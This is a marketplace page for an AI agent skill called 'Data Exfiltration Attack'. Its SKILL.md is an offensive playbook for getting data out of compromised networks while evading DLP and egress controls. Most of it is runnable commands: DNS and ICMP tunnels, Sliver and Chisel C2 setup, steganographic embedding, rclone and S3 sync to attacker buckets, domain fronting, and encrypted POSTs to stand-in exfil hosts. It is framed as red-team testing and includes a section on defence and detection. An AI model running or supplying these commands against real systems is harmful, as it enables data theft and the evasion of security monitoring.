Data Exfiltration Attack logo

Data Exfiltration Attack

Community
brucesongs
data-exfiltration-attack

Attacks for exfiltrating data from compromised networks and bypassing DLP/egress controls. Covers DNS tunneling, ICMP/HTTPS tunneling, protocol smuggling, steganographic exfil, cloud-native exfil (S3/OpenSearch/BigQuery), and DLP bypass. Use when testing egress monitoring, validating DLP controls, or simulating APT exfiltration campaigns.

Overview

Publisherbrucesongs
Repositorykali-claw
Skill namedata-exfiltration-attack
Stars
70
Forks
18
Bundled files
9
LicenseMIT
Links
  • Markdown instructions

    A SKILL.md file the model loads on demand, so it only costs tokens when a request actually matches.

  • Works with any LLM

    AI skills are plain Markdown, not provider-specific code, so this works with GPT, Claude, Gemini, Grok, or a local model.

  • 9 bundled files

    Scripts, templates, and references the model can read while it works. Files are read-only and never executed.

  • Open source

    Published by brucesongs on GitHub. Read the source before you install it.

Installation

Install the Data Exfiltration Attack AI skill in TypingMind to use it with any LLM, or drop it into another agent that reads SKILL.md.

1

Install in TypingMind

TypingMind installs a skill straight from its GitHub folder — it reads SKILL.md, bundles the resource files, and stores the result locally.

  1. Open the app and go to Plugins → Skills.
  2. Choose "Install from GitHub".
  3. Paste the skill folder URL below and confirm.
  4. Enable the skill in any chat where you want it available.
Plugins → Skills → Add skill → From GitHub URL, then paste the folder URL and press Continue.
2

Install in another agent

Any agent that reads the Agent Skills format can use this skill — copy the folder into that agent's skills directory.

Claude Code — .claude/skills
git clone --depth 1 https://github.com/brucesongs/kali-claw.git /tmp/kali-claw
mkdir -p .claude/skills
cp -r /tmp/kali-claw/skills/data-exfiltration-attack .claude/skills/data-exfiltration-attack
Restart Claude Code after copying so it picks up the new skill.

Use it in TypingMind

Enable Data Exfiltration Attack in any TypingMind chat and the model takes it from there. Its name and description sit in the system prompt, and the moment a request matches, the model loads the full instructions itself — you never invoke it by hand, and it costs no tokens until it is actually used.

The model loads Data Exfiltration Attack on its own as soon as a request matches it.

Works with any AI model

AI skills are plain Markdown instructions rather than provider-specific code, so Data Exfiltration Attack is not tied to the model it was written for. Install it once in TypingMind and use it with GPT-5, Claude, Gemini, Grok, DeepSeek, Mistral, Llama, or a local model you run yourself — all on your own API keys.

  • Loaded only when it is needed

    The system prompt carries just the name and description. The instructions are fetched on the first matching request, so an idle skill costs nothing.

  • Switch models mid-chat

    Because the skill is instructions rather than code, changing model does not break it — the next model reads the same SKILL.md.

Skill instructions

This is the SKILL.md content the model loads. Read it before installing — a skill is instructions your model will follow.

Data Exfiltration Attack

Summary

Exfiltration is the final stage of the kill chain — once attackers have collected data, they must move it out without tripping DLP, IDS/IPS, SWG, or CASB controls. This domain covers the full exfiltration landscape: DNS tunneling (the most common C2/exfil channel in restricted environments), ICMP/HTTP(S) tunneling, protocol smuggling over legitimate services (Google Drive / OneDrive / GitHub / Cloudflare), steganographic exfiltration (PNG/BMP/PDF steg), cloud-native exfil (S3 cross-account, OpenSearch collection, BigQuery external tables), and DLP bypass techniques. Includes operator playbooks for egress testing, DLP validation, and APT exfiltration simulation against enterprise defenses (Zscaler/Netskope/Forcepoint/Palo Alto).

Key Terms

  • Exfiltration — Unauthorized transfer of data out of a network (MITRE TA0010)
  • C2 / Command and Control — Channel attacker uses to control compromised host (TA0011)
  • DNS tunneling — Encoding IP/TCP traffic inside DNS queries (iodine, dnscat2)
  • Domain fronting — Using legitimate CDN SNI to hide attacker origin (T1090.004)
  • DLP — Data Loss Prevention (content-aware egress filter)
  • SWG — Secure Web Gateway (URL + content filtering for HTTP/HTTPS)
  • CASB — Cloud Access Security Broker (cloud-aware DLP)
  • LOLBin — Living Off The Land Binary (signed Microsoft binaries used for exfil)
  • Dead-drop resolver — Public service (GitHub, Telegram) used as C2 polling point
  • Low-and-slow — Exfil cadence kept below detection baseline (1–10 MB/day)
  • Double extortion — Exfil + ransomware pattern (Conti, LockBit, BlackCat)
  • Air-gap exfil — Out-of-band channels (acoustic, EM, LED) for isolated networks

Scope

This skill covers offensive exfiltration testing for red team engagements:

  • Egress validation against DLP / SWG / CASB
  • DNS / ICMP / HTTPS / stego / cloud exfil channels
  • APT simulation (state actor + cybercrime tradecraft)
  • DLP rule validation
  • Reporting on detection gaps

Out of scope: data theft (real PII), destructive wipers, mass DoS of egress, production source-of-truth corruption.

Use Cases

  • Egress validation: Test whether SWG/CASB catches DNS tunneling, HTTPS beaconing, low-and-slow exfil
  • DLP rule testing: Validate DLP catches PAN, SSN, MRN, source code, design docs across channels
  • APT simulation: Mimic APT41 / SolarWinds / Emotet / Conti exfiltration patterns
  • DNS tunnel C2: Operate C2 in DNS-only environments (captive portals, segmented OT)
  • Cloud exfil: Abuse legitimate cloud services (S3 / BigQuery / OpenSearch) for stealth exfil
  • Stego exfil: Hide payload in PNG/BMP/PDF/WAV metadata for covert channel
  • Protocol smuggling: Disguise exfil as legitimate traffic (NTP, SCTP, WebSocket, gRPC)
  • Dead-drop resolvers: Use public services (GitHub, Reddit, Pastebin, Telegram) for C2 polling
  • ICMP tunneling: Operate in ICMP-only environments (some firewall configs allow ICMP only)
  • Domain fronting: Hide exfil destination behind CDN front (Cloudflare, Fastly, Akamai)

Core Tools

ToolPurpose
dnscat2DNS tunnel C2 + exfil
iodineDNS tunnel (IP-over-DNS)
dns2tcpDNS tunnel (TCP-over-DNS)
chiselHTTP/WebSocket tunnel with mTLS
merlinHTTP/2 C2 (Go)
sliverHTTP/HTTPS/DNS C2
gostMulti-protocol tunnel (SOCKS/HTTP/TLS)
ngrokEgress tunnel for testing
cloudflaredCloudflare tunnel
stunnelTLS wrapper
socatUniversal socket relay
proxychainsSOCKS chain
torOnion routing
steghideImage/audio steganography
zstegPNG/BMP steganography detection
powershellLOLBin for encoded commands
certutilWindows LOLBin (base64 decode, download)
bitsadminWindows BITS for low-and-slow exfil
curlUniversal HTTP client

Methodology

Phase 1 — Reconnaissance

Map the egress surface: what protocols are allowed, where DLP sits, what cloud services are reachable.

bash
# Test outbound protocols
for proto in 53/udp 53/tcp 80/tcp 443/tcp 123/udp 4444/tcp 8080/tcp; do
  nc -vz -w 2 exit-proxy.example.com ${proto/\/*/} -p ${proto/*\//} 2>&1 | grep -E "succeeded|failed"
done

# Check DNS egress (most permissive)
dig +short AAAA exfil.example.com @internal-dns.example.com

# Identify DLP/SWG/CASB in path
curl -s https://egress-check.example.com/ | grep -iE "zscaler|netskope|forcepoint|paloalto|cisco|symantec"

Phase 2 — Channel Selection

Pick exfil channel based on egress surface:

ChannelWhen to use
DNS tunnelOnly DNS egress allowed (captive portal, OT network)
HTTPS beaconHTTPS egress allowed, want to blend with normal traffic
ICMP tunnelICMP allowed, TCP heavily monitored
SteganographyImage/file upload permitted, want plausible deniability
Cloud serviceGoogle Drive / OneDrive reachable, want "legitimate" exfil
Protocol smugglingWant to disguise as NTP/SCTP/WebSocket

Phase 3 — Payload Preparation

Stage data for exfil — chunk, compress, encrypt, encode.

bash
# Stage + chunk
split -b 1024 secret.tar.gz chunk_

# Compress + encrypt
tar czf - /secret | openssl enc -aes-256-cbc -k "$KEY" -out exfil.enc

# Base64 encode for text channel
base64 -w0 exfil.enc > exfil.b64

Phase 4 — DNS Tunneling

bash
# iodine server (attacker-controlled NS)
iodined -c -f -P REPLACE_WITH_YOUR_PW 172.16.0.1 t1.exfil.example.com

# iodine client (victim)
iodine -P REPLACE_WITH_YOUR_PW t1.exfil.example.com
# Now TUN device up, can SSH/SCP over DNS

# dnscat2 (more stealthy, supports C2)
ruby dnscat2.rb exfil.example.com

# Client
./dnscat2 exfil.example.com

Phase 5 — HTTPS C2/Exfil

bash
# Sliver HTTPS implant
sliver > https --domain legit-looking.example.com --tls-cert fake.crt

# Chisel reverse tunnel (mTLS)
chisel server -p 8080 --reverse --tls-key server.key --tls-cert server.crt
chisel client https://chisel.example.com:8080 R:1080:socks

# Merlin HTTP/2
merlin > set URL https://cdn.example.com/

Phase 6 — ICMP Tunneling

bash
# Hans (ICMP tunnel)
hans -v -f -s 1 -p REPLACE_WITH_YOUR_PW 10.0.0.1   # server
hans -v -f -c -p REPLACE_WITH_YOUR_PW 10.0.0.1     # client

# Ptunnel (ICMP tunnel via ping)
ptunnel -r exfil.example.com -lp 8000

Phase 7 — Steganographic Exfil

bash
# Embed payload in PNG
steghide embed -cf cover.png -ef exfil.enc -p REPLACE_WITH_YOUR_PW -sf stego.png

# Embed in WAV
steghide embed -cf cover.wav -ef exfil.enc -p REPLACE_WITH_YOUR_PW -sf stego.wav

# PDF stego (metadata + JavaScript payload)
exiftool -Comment="$(base64 exfil.enc)" cover.pdf -o stego.pdf

Phase 8 — Cloud Service Abuse

bash
# Exfil via legitimate cloud service
# Google Drive
rclone copy /secret gdrive:exfil/

# AWS S3 cross-account
aws s3 sync /secret s3://attacker-bucket/ --endpoint-url https://s3.amazonaws.com

# GitHub gist
curl -X POST -H "Authorization: token $GH_PAT" \
  https://api.github.com/gists -d @gist-payload.json

# Cloudflare R2
aws s3 sync /secret s3://exfil/ --endpoint-url https://abc.r2.cloudflarestorage.com

Phase 9 — Domain Fronting

bash
# Domain fronting via Cloudflare
curl -H "Host: hidden-c2.example.com" \
     https://legitimate-cdn-hosted-on-cloudflare.com/

# Domain fronting via AWS CloudFront
curl -H "Host: hidden-c2.example.com" \
     https://d111111abcdef8.cloudfront.net/

Phase 10 — Reporting

Produce exfil validation report:

  • Channels tested (which succeeded / failed)
  • Volume exfil'd per channel
  • DLP/SWG alerts triggered (or not)
  • Detection gaps

Practical Steps

Step 1 — Map egress surface

bash
# Identify allowed outbound
for port in 53 80 443 123 445 3306 3389 5432 5900 8080 8443; do
  timeout 2 nc -vz exit-proxy.example.com $port 2>&1 | grep -E "succeeded" && echo "Port $port OPEN"
done

# Test DNS recursion
dig +short AAAA exfil.attacker.example.com @internal-dns.example.com

Step 2 — Test DNS tunnel

bash
# Set up attacker NS (skip this in lab)
# Run iodine client on victim
iodine -P REPLACE_WITH_YOUR_PW t1.exfil.example.com
# Verify TUN device
ip addr show dns0
# Now SSH over DNS
ssh user@172.16.0.1

Step 3 — Test HTTPS C2

bash
# Sliver implant
sliver > generate --http https://c2.example.com --os linux
sliver > http
# Implant beacons out, exfil via HTTP POST

# Beaconing simulation
while read chunk; do
  curl -X POST https://c2.example.com/upload -d "$chunk"
done < chunks.txt

Step 4 — Test stego exfil

bash
# Generate cover image
ffmpeg -f lavfi -i color=black:s=1920x1080:d=1 cover.png

# Embed
steghide embed -cf cover.png -ef secret.enc -p REPLACE_WITH_YOUR_PW -sf stego.png

# Verify extraction works
steghide extract -sf stego.png -p REPLACE_WITH_YOUR_PW

Step 5 — Test DLP bypass

bash
# Generate synthetic PII (for testing DLP rules)
python3 -c "
import random
for _ in range(100):
  print(f'{random.randint(100000000, 999999999):09d}')  # SSN-like
" > fake-ssn.txt

# Try exfil raw (should be caught)
curl -X POST https://exfil.example.com/ -d @fake-ssn.txt

# Try exfil encoded (test if DLP decodes)
base64 fake-ssn.txt | curl -X POST https://exfil.example.com/ -d @-

# Try exfil encrypted (DLP can't see)
openssl enc -aes-256-cbc -k "$KEY" -in fake-ssn.txt | curl -X POST https://exfil.example.com/ -d @-

Defense Perspective

Defenders must assume:

  1. DNS is a C2 channel — most DLP ignores DNS; APTs exploit this
  2. Cloud services are dual-use — Google Drive / GitHub gists / Pastebin are exfil vectors
  3. TLS inspection has blind spots — pinned apps, certificate-bound, DoH/DoQ bypass SWG
  4. Volume-based detection misses low-and-slow — rate-based detection misses patient exfil
  5. Stego is hard to detect at scale — but can flag anomalies (image entropy, metadata size)
  6. ICMP is overlooked — many networks allow ICMP; few inspect payload
  7. Domain fronting breaks destination-based detection — must inspect SNI vs Host header
  8. LOLBins bypass allowlist — certutil, bitsadmin, mshta are signed Microsoft binaries

Key defensive controls:

  • DNS firewalling (block known-tunneled NS, monitor TXT query volume)
  • TLS inspection with CFW (Cloudflare Workers), but respect cert pinning
  • Cloud service allowlist + monitoring (Google Workspace / M365 audit logs)
  • Steganography detection (entropy analysis, metadata size limits)
  • Domain fronting detection (SNI ≠ Host header alert)
  • LOLBin monitoring (certutil / bitsadmin / mshta telemetry)
  • Behavior-based detection (volume baseline + peer-group anomaly)
  • Decoy documents (canarytokens) to detect exfil channel
  • Egress allowlist (no direct Internet, force proxy)

Detection Methods

Network-Layer Indicators

  • DNS tunneling signatures: Long DNS queries (>50 chars), high-entropy subdomains, TXT/A record bursts.
  • DNS beaconing: Periodic DNS queries to attacker-controlled domain (Cobalt Strike signature).
  • HTTPS to unfamiliar domains: Large uploads to unknown cloud storage / file sharing.
  • Protocol anomalies: SSH over 443, HTTP tunneling, ICMP tunneling (large ping payloads).

SIEM Detection Rules

  • Splunk SPL: index=dns | where len(query) > 50 | stats count by src_ip | where count > 100
  • Splunk SPL: index=firewall action=allowed | stats sum(bytes_out) by src_ip | sort -sum(bytes_out) | head 20
  • RITA (Real Intelligence Threat Analytics): Beacon detection via statistical analysis.
  • DLP systems: Forcepoint, Symantec DLP for content-based detection.

Endpoint Indicators

  • Mass file read events: Process reading many files in short window (precursor to exfil).
  • Compress-then-upload: tar/zip followed by curl/scp within 60 seconds.
  • Encrypted archive creation: New .zip/.7z with password ( evasion signature).

Defense Evasion Techniques

Bandwidth-Aware Exfiltration

  • Low & slow: Pace exfil below network baseline (e.g., 100 KB/hr); evades rate-based detection.
  • Distribute across protocols: Mix DNS, HTTPS, ICMP; spread exfil across multiple channels.
  • Time-windowed: Use off-hours (1-5 AM local) when network baseline is low.
  • Trickle over weeks: Spread exfil over long period; below anomaly threshold.

Covert Channels

  • DNS tunneling: Encode data in DNS queries (dnscat2, iodine); bypasses most firewall rules.
  • ICMP tunneling: Data in ICMP echo payload; bypasses port-based filtering.
  • HTTP/3 (QUIC): Newer protocol; many monitoring tools don't decode yet.
  • WebSocket: Persistent connection; bypasses connection-counting rate limits.
  • Cloud CDN abuse: Use legitimate CDN (Cloudflare, AWS CloudFront) to mask destination.

Steganography

  • Image LSB: Encode data in least-significant bits of PNG/BMP images.
  • Audio steganography: Encode in WAV/MP3 spectrogram (Coagula, Arss).
  • Video steganography: Frame-by-frame LSB modification; high bandwidth.
  • PDF object abuse: Hide data in PDF object streams.
  • Network packet timing: Encode data in inter-packet delays (covert timing channel).

Cloud Exfiltration Stealth

  • Use sanctioned apps: Upload to corporate OneDrive/Google Drive; below suspicion.
  • OAuth consent abuse: Use legitimate OAuth flow to access user data via Microsoft Graph.
  • Snapshot sharing: Share EBS/snapshot to attacker AWS account via legitimate mechanism.
  • Cross-region replication: S3 replication to attacker-controlled bucket; appears as DR config.

References

  • MITRE ATT&CK Exfiltration Tactics — https://attack.mitre.org/tactics/TA0010/
  • MITRE ATT&CK Command and Control — https://attack.mitre.org/tactics/TA0011/
  • CISA AA21-148A — DarkSide Ransomware (exfil techniques)
  • Mandiant APT1 Report (DNS tunneling exfil)
  • CrowdStrike 2024 Global Threat Report
  • Google TAG — APT41 DNS Tunneling
  • SolarWinds SUNBURST Analysis (FireEye, 2020)
  • "Network Security Assessment" (McNutt, 2024)
  • "Security Engineering" (Anderson, 3rd Edition)
  • DNS Tunneling Detection — https://github.com/bsidessf/dns-tunneling-detect
  • OWASP Egress Testing Guide
  • IETF RFC 7858 — DNS over TLS
  • IETF RFC 8484 — DNS over HTTPS
  • SANS ICS — Egress monitoring for OT networks

Channel Selection Matrix

Egress allowedPrimary channelFallback channelVolume target
DNS onlyiodine / dnscat2DoH (8.8.8.8)<100 MB/day
DNS + HTTPSSliver HTTPSDNS backup100 MB–1 GB
ICMP onlyHans / ptunnel<50 MB/day
All TCPSliver + chiselMegaSyncUnlimited
Cloud SaaS allowedGoogle Drive / GitHubMegaSyncUnlimited
Air-gappedAcoustic / EMLED / power-line<10 KB/s

MITRE ATT&CK Mapping

TechniqueIDChannel
Exfiltration over C2 channelT1041HTTPS / DNS
Exfiltration over alternative protocolT1048DNS / ICMP
Exfiltration over asymmetric encryptionT1048.002HTTPS
Exfil via scheduled taskT1053certutil / bitsadmin
Application layer protocol — webT1071.001HTTPS
Application layer protocol — DNST1071.004DNS
Proxy (CDN domain fronting)T1090Cloudflare / Fastly
Multi-Stage ChannelsT1104DNS → HTTPS
Data encoding / transformationT1132base64 / stego
Exfiltration to cloud storageT1567.002S3 / Drive
Non-standard portT15718443 / 8444
Protocol tunnelingT1572iodine / chisel
Encrypted channelT1573TLS / mTLS

Engagement Workflow

  1. Scope — confirm egress channels, DLP vendor, allowed volume cap
  2. Recon — map egress surface (DNS / HTTPS / ICMP / cloud SaaS)
  3. Channel select — match channel to egress + DLP visibility
  4. Lab — build C2 infrastructure, steg tools, synthetic PII
  5. Attack — payload prep → channel test → DLP bypass
  6. Cleanup — remove implants, rotate infrastructure
  7. Report — channels tested, volume exfil'd, DLP alerts triggered

DLP Vendor Cheat Sheet

VendorDetection methodCommon bypass
Zscaler ZIASNI + content regex + TLS inspectionDoH / DoT / cert pinning
NetskopeCASB cloud-awareEncrypt before upload
ForcepointContent + behaviorSteganography (entropy not flagged)
Palo AltoApp-ID + URL filterDomain fronting
Symantec DLPEndpoint content agentEncode / encrypt on host
Cisco UmbrellaDNS reputationdGA domains
BluecoatContent + reputationLOLBin + legitimate cloud

Volume Budget Guidelines

Engagement typeDaily volume capPer-channel
State actor sim (APT29)1–10 MB/dayDNS + HTTPS split
Cybercrime sim (Conti)100 GB/day (with approval)HTTPS primary
OT network test<1 MB/dayDNS TXT only
Cloud exfil test1–10 GB / SaaS accountS3 / Drive
Air-gapped test<10 KB/sAcoustic / EM

Threat Actor Profiles

ActorTypePreferred channelsVolume profile
APT29 / NOBELIUMState (Russia)Domain fronting + OAuth<100 MB/day
APT41 / BARIUMState (China)DNS tunneling<10 MB/day
UNC5537CybercrimeSnowflake API abuse100s of GB
Conti / LockBitCybercrimeRclone / StealBit100 GB–6 TB
BlackCat / ALPHVCybercrimeMegaSync1–6 TB
DarkSideCybercrimeRclone to S3100–700 GB
Emotet / TrickBotCybercrimeHTTPS POST + DNS<10 KB/beacon

Detection Coverage Map

TechniqueDetection methodVendor
DNS tunnelingTXT entropy + NS rateCorelight, ExtraHop
High-volume HTTPS exfilEgress baseline + ratePalo Alto, Cisco
Domain frontingSNI ≠ Host headerBluecoat, F5
Rclone invocationEDR binary alertCrowdStrike, Defender
OAuth token abuseSaaS anomalyMicrosoft Defender for Cloud
SteganographyImage entropy analysisFireEye, FireEye HX
OT exfilDNS TXT anomaly on OTDragitt, Nozomi

Compliance Context

  • PCI DSS 3.4.1 — PAN data must be unreadable during transmission (DLP required)
  • HIPAA Security Rule — PHI egress monitoring (CASB recommended)
  • GDPR Article 32 — encryption + DLP for personal data
  • SOC 2 Type II — CC6.7 transmission controls
  • ISO 27001:2022 — A.13.1 network controls + A.13.2 information transfer
  • NIST 800-53 Rev 5 — SC-8 transmission confidentiality + AC-3 enforcement
  • NYDFS 500.15 — covered entity exfiltration detection
  • SEC Rule 10-12B (2024) — 4-day breach disclosure

Lab Infrastructure

bash
# Bind9 (DNS lab)
sudo apt install bind9

# iodine server (NS)
iodined -c -f -P REPLACE_WITH_YOUR_PW 172.16.0.1 t1.exfil.example.com

# Sliver C2
curl https://sliver.sh/install | sudo bash

# steghide
sudo apt install steghide

# Rclone (cloud exfil)
curl https://rclone.org/install.sh | sudo bash

Quality Checklist

  • All in-scope channels tested (DNS / HTTPS / ICMP / stego / cloud)
  • DLP / SWG vendor identified
  • Volume exfil'd documented per channel
  • DLP alerts triggered (or not — explain why)
  • Detection rules authored for ≥3 gaps
  • Synthetic PII used (no real customer data)
  • Cleanup performed
  • Customer debrief scheduled
  • Final report delivered
  • SOC handoff completed

Bundled files

The model reads these on demand while the skill is loaded. They are exposed as readable files and are never executed.

Frequently asked questions

What does the Data Exfiltration Attack AI skill do?

Attacks for exfiltrating data from compromised networks and bypassing DLP/egress controls. Covers DNS tunneling, ICMP/HTTPS tunneling, protocol smuggling, steganographic exfil, cloud-native exfil (S3/OpenSearch/BigQuery), and DLP bypass. Use when testing egress monitoring, validating DLP controls, or simulating APT exfiltration campaigns.

Why use Data Exfiltration Attack on TypingMind?

Because you install it once and use it with any model. Data Exfiltration Attack is plain Markdown rather than provider-specific code, so the same skill runs on GPT-5, Claude, Gemini, Grok, or a local model — and you can switch model mid-chat without it breaking. TypingMind runs on your own API keys, so you pay providers directly instead of a per-seat subscription, and your skills and chats stay in your own storage.

How do I install Data Exfiltration Attack in TypingMind?

Open Plugins → Skills → Install from GitHub in TypingMind and paste https://github.com/brucesongs/kali-claw/tree/main/skills/data-exfiltration-attack. TypingMind reads its SKILL.md and bundles its files and installs it as a skill you can enable per chat.

Which AI models can use Data Exfiltration Attack?

Any model you connect in TypingMind. AI skills are plain Markdown instructions rather than provider-specific code, so GPT, Claude, Gemini, Grok, and local models can all load this skill when a request matches it.

How many AI models can I use with Data Exfiltration Attack?

As many as you like. As long as a model supports skills, you can use Data Exfiltration Attack with it — GPT, Claude, Gemini, Grok, DeepSeek, Mistral, Llama and more — all on TypingMind with your own API keys.

Is the Data Exfiltration Attack AI skill free?

Yes. It is published on GitHub by brucesongs under the MIT license. You only pay your own AI provider for the tokens you use.

What are AI skills?

An AI skill is a reusable instruction bundle that teaches an AI model how to do one specific task. It follows the open Agent Skills format: a SKILL.md file with a name and description, plus any scripts, templates or reference files the model may need. The model reads the instructions only when your request matches the skill, so an installed skill costs nothing until it is used.

How are AI skills different from plugins or MCP servers?

A plugin or MCP server gives a model new tools to call — code that runs somewhere and returns a result. An AI skill gives the model knowledge and process instead: how to approach a task, which steps to follow, what good output looks like. Skills are plain Markdown, so they need no server, no API key and no runtime, and they work with any model.

View all

Set up your own AI workspace now

Get notified about new features and future giveaways by subscribing to our newsletter 👇